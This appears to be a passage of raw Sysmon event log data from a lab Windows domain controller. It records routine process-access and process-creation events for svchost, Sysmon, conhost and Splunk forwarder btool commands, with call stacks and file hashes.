13:12:02.005{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003427Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.005{08A6967A-4321-6000-AB00-000000009A01}42204160C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-4322-6000-AC00-000000009A01}4176C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003426Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.006{08A6967A-4322-6000-AC00-000000009A01}4176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4321-6000-AB00-000000009A01}4220C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000003425Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4321-6000-AB00-000000009A01}4220C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003424Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003423Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003422Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003421Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003420Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003419Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003418Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003417Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003416Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003415Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4321-6000-AB00-000000009A01}4220C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003414Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4321-6000-AA00-000000009A01}50804164C:\Windows\system32\cmd.exe{08A6967A-4321-6000-AB00-000000009A01}4220C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003413Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.999{08A6967A-4321-6000-AB00-000000009A01}4220C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-4321-6000-AA00-000000009A01}5080C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000003558Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.932{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4324-6000-B500-000000009A01}4824C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003557Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.932{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003556Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.932{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003555Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.932{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003554Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.932{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003553Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.932{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003552Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.932{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003551Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.932{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003550Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.932{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4324-6000-B500-000000009A01}4824C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003549Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.932{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003548Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.932{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003547Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.932{08A6967A-4324-6000-B400-000000009A01}8084808C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-4324-6000-B500-000000009A01}4824C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003546Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.933{08A6967A-4324-6000-B500-000000009A01}4824C:\Program 